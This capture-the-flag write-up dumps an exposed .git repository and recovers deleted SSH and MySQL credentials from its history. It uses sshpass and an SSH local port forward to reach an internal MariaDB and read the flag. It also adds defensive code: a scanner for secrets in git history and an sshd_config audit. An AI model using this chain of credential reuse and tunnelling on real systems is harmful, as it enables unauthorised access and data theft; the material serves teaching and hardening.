This server listens on two ports: 443 and 222. Find a way to get the flag.
https://gishadb.flag4all.sh
Author: Penthium2 (BZHack)
We find a git repository exposed on the web server:
$ curl https://gishadb.flag4all.sh/.git/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /.git</title>
</head>
<body>
<h1>Index of /.git</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="COMMIT_EDITMSG">COMMIT_EDITMSG</a></td><td align="right">2023-05-25 12:53 </td><td align="right"> 24 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="HEAD">HEAD</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 23 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="branches/">branches/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="config">config</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 92 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="description">description</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> 73 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="hooks/">hooks/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="index">index</a></td><td align="right">2023-05-25 12:53 </td><td align="right">217 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="info/">info/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="logs/">logs/</a></td><td align="right">2023-05-25 12:44 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="objects/">objects/</a></td><td align="right">2023-05-25 12:53 </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="refs/">refs/</a></td><td align="right">2023-05-25 12:43 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.56 (Debian) Server at gishadb.flag4all.sh Port 80</address>
</body></html>
So we retrieve it:
$ git-dumper https://gishadb.flag4all.sh/ git
$ cd git
$ git log
commit cfdccf9472e0b985abc372f90fa64352d744b5ad (HEAD -> master)
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:53:28 2023 +0200
suppresion info preprod
commit 13c0faef33bf466602913bc3918094cfefea072f
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:52:44 2023 +0200
ajout info ssh pour preprod
commit 6dbcaf8c22bbe74aa2562ac60f58602d8592347a
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:50:32 2023 +0200
sécurisation
commit 02ef7e50a0bb9954d7819f8fd7c7b2c593db0d73
Author: penthium2 <penthium2@hotmail.fr>
Date: Thu May 25 14:44:03 2023 +0200
ipremier commit
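The log above shows the usual shape of a leak: one commit adds "ssh info for preprod", the next one removes it. Deleting the file only changes the working tree; every earlier object is still in the repository, so anyone who can read the repo (here, anyone who can read /.git/ over HTTP) can read the removed lines. As an added example (not code from the writeup or its author), here is a small scanner over `git log -p` output that flags credential-looking lines on both the added and the removed side of each hunk. The patterns, the dataclass, the function names and the sample log (placeholder hashes, translated commit messages, the same shapes of lines as on this page) are all constructed for the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Credential-looking line shapes. Constructed for this example; a real
# pre-commit or CI scanner would carry a much larger pattern set.
SECRET_PATTERNS = {
    "password assignment": re.compile(
        r"(?i)\b(pass(word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*\S+"),
    "ssh login target": re.compile(r"(?i)\blogin(ssh)?\b\s*[:=]\s*\S+@\S+"),
    "pdo dsn with credentials": re.compile(
        r"new\s+PDO\s*\(\s*'[^']*'\s*,\s*'[^']*'\s*,\s*'[^']*'"),
}


@dataclass
class Finding:
    commit: str
    path: str
    side: str   # "added" or "removed"
    kind: str
    line: str


def scan_history(log_patch: str) -> list[Finding]:
    """Walk `git log -p` output and flag credential-looking lines on both
    sides of every hunk. A 'removed' hit is the interesting case: the file
    is gone from the working tree but the value is still in history."""
    findings: list[Finding] = []
    commit = path = ""
    in_hunk = False
    for raw in log_patch.splitlines():
        if raw.startswith("commit "):
            commit, in_hunk = raw.split()[1], False
        elif raw.startswith("diff --git "):
            in_hunk = False
        elif raw.startswith("@@"):
            in_hunk = True
        elif not in_hunk and raw.startswith(("--- ", "+++ ")):
            # File header: keep the real name, skip /dev/null on create/delete.
            name = raw[4:].strip()
            if name != "/dev/null":
                path = name[2:] if name[:2] in ("a/", "b/") else name
        elif in_hunk and raw[:1] in ("+", "-"):
            content = raw[1:]
            for kind, pattern in SECRET_PATTERNS.items():
                if pattern.search(content):
                    side = "added" if raw[0] == "+" else "removed"
                    findings.append(Finding(commit, path, side, kind, content.strip()))
                    break
    return findings


def removed_but_in_history(findings: list[Finding]) -> list[Finding]:
    """Secrets whose only 'fix' was a deletion commit: these must be rotated."""
    return [f for f in findings if f.side == "removed"]


# Constructed sample in `git log -p` shape (placeholder hashes).
SAMPLE_LOG = """\
commit cccccccccccccccccccccccccccccccccccccccc
Author: dev <dev@example.invalid>
Date:   Thu May 25 14:53:28 2023 +0200

    remove preprod info

diff --git a/info_login b/info_login
deleted file mode 100644
index d904e9b..0000000
--- a/info_login
+++ /dev/null
@@ -1,2 +0,0 @@
-loginssh : gishadb@192.168.124.1
-pass : iop

commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: dev <dev@example.invalid>
Date:   Thu May 25 14:52:44 2023 +0200

    add ssh info for preprod

diff --git a/info_login b/info_login
new file mode 100644
index 0000000..d904e9b
--- /dev/null
+++ b/info_login
@@ -0,0 +1,2 @@
+loginssh : gishadb@192.168.124.1
+pass : iop

commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: dev <dev@example.invalid>
Date:   Thu May 25 14:44:03 2023 +0200

    first commit

diff --git a/config.php b/config.php
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/config.php
@@ -0,0 +1,3 @@
+<?php
+$cnx = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8', 'app', 'db_Super_P4$$');
+?>
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_LOG):
        print(f"{f.commit[:7]} {f.side:7} {f.path}: [{f.kind}] {f.line}")
```

Run against a real repository with `git log -p | python3 scan.py` (after swapping SAMPLE_LOG for stdin). The point of reporting the removed side is the one this page illustrates: a "suppression" commit is not a fix, the credentials need rotating and, if the repository is reachable by others, the history needs rewriting.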
$ git diff 13c0faef33bf466602913bc3918094cfefea072f
diff --git a/info_login b/info_login
deleted file mode 100644
index d904e9b..0000000
--- a/info_login
+++ /dev/null
@@ -1,2 +0,0 @@
-loginssh : gishadb@192.168.124.1
-pass : iop
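Review bot: this hunk only deletes info_login from the tree; the two removed lines (`loginssh : gishadb@192.168.124.1`, `pass : iop`) remain in the parent commit 13c0faef and in every clone or dump of the repository, so the credentials need to be rotated and the history rewritten, not just the file removed. The repository itself should also not be served from the web root (the /.git/ listing above is what made this reachable).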
When we try to log in over SSH, the terminal gets spammed and the shell is unusable.
So instead we forward MySQL to our loopback with a local port forward (with -N no remote shell is requested, so the noisy login never starts) and continue enumerating with the credentials found in config.php:
<?php
$cnx = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8', 'app', 'db_Super_P4$$');
?>
Pane 1:
sshpass -p 'iop' ssh -p 222 -L 3306:127.0.0.1:3306 -N gishadb@gishadb.flag4all.sh
Pane 2:
$ mysql -h 127.0.0.1 -u app -p app
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 47176
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [app]> show tables;
+---------------+
| Tables_in_app |
+---------------+
| hand |
| users |
+---------------+
2 rows in set (0.018 sec)
MariaDB [app]> select * from users;
+----+----------+-----------+-----------------------+
| id | lastname | firstname | email |
+----+----------+-----------+-----------------------+
| 1 | Deux | Penthium | penthium2@flag4all.sh |
+----+----------+-----------+-----------------------+
1 row in set (0.016 sec)
MariaDB [app]> select * from hand;
+----+-----------------------------+----------+
| id | finger | ring |
+----+-----------------------------+----------+
| 1 | pouce | Penthium |
| 2 | index | Penthium |
| 3 | FLAG{TAK3_Care_Of_SSH_POWA} | Penthium |
| 4 | anulaire | Penthium |
| 5 | oriculaire | Penthium |
+----+-----------------------------+----------+
5 rows in set (0.016 sec)
MariaDB [app]>
ggwp
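The flag says it: the whole chain only worked because SSH on 222 accepted a password login with a trivial password, and then let the session forward TCP to a MySQL that was otherwise bound to loopback. As an added example (not from the writeup), here is a small audit over an sshd_config, with a constructed config that permits this chain next to a hardened one. Option names and their defaults are those documented in sshd_config(5) (first occurrence of an option wins, everything after the first Match is conditional); the rule set, the function names and the two sample configs are my assumptions.

```python
import re

# Defaults from sshd_config(5) for the options audited here:
# an absent directive means the default applies.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "allowtcpforwarding": "yes",
    "permitopen": "any",
}

# option -> (predicate that is true when the value is weak, what to do about it)
RULES = {
    "passwordauthentication": (lambda v: v == "yes",
        "password logins enabled: a weak password is enough; use keys and set 'no'"),
    "permitrootlogin": (lambda v: v == "yes",
        "root may log in with a password; set 'no' or 'prohibit-password'"),
    "allowtcpforwarding": (lambda v: v == "yes",
        "sessions may forward TCP to loopback-only services (e.g. MySQL); set 'no' unless needed"),
    "permitopen": (lambda v: v == "any",
        "forwarding destinations unrestricted; set PermitOpen to the exact host:port needed"),
}


def parse_sshd_config(text):
    """Global section of an sshd_config as {option: value}, keys lowercased.
    First occurrence wins, as in sshd; parsing stops at the first Match block."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"(\S+)[\s=]+(.*)", line)   # 'Key value' or 'Key=value'
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip().strip('"')
        if key == "match":
            break
        opts.setdefault(key, val.lower())
    return opts


def audit_sshd_config(text):
    """Return (option, effective value, 'explicit'|'default', advice) per weak setting."""
    opts = parse_sshd_config(text)
    findings = []
    for key, (is_weak, advice) in RULES.items():
        value = opts.get(key, DEFAULTS[key])
        if is_weak(value):
            findings.append((key, value, "explicit" if key in opts else "default", advice))
    return findings


# Constructed: a config of the kind that lets the chain on this page work.
WEAK_CONFIG = """
Port 222
PasswordAuthentication yes
PermitRootLogin yes
AllowTcpForwarding yes
"""

# Constructed: same port, keys only, no forwarding except one user to one destination.
HARDENED_CONFIG = """
Port 222
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
AllowTcpForwarding no
PermitOpen none
Match User deploy
    AllowTcpForwarding yes
    PermitOpen 127.0.0.1:3306
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name}")
        for key, value, source, advice in audit_sshd_config(cfg):
            print(f"  {key}={value} ({source}): {advice}")
```

Note that an empty config still produces findings: PasswordAuthentication, AllowTcpForwarding and PermitOpen are permissive by default, which is why a host that "never touched sshd_config" is exactly the host this writeup describes.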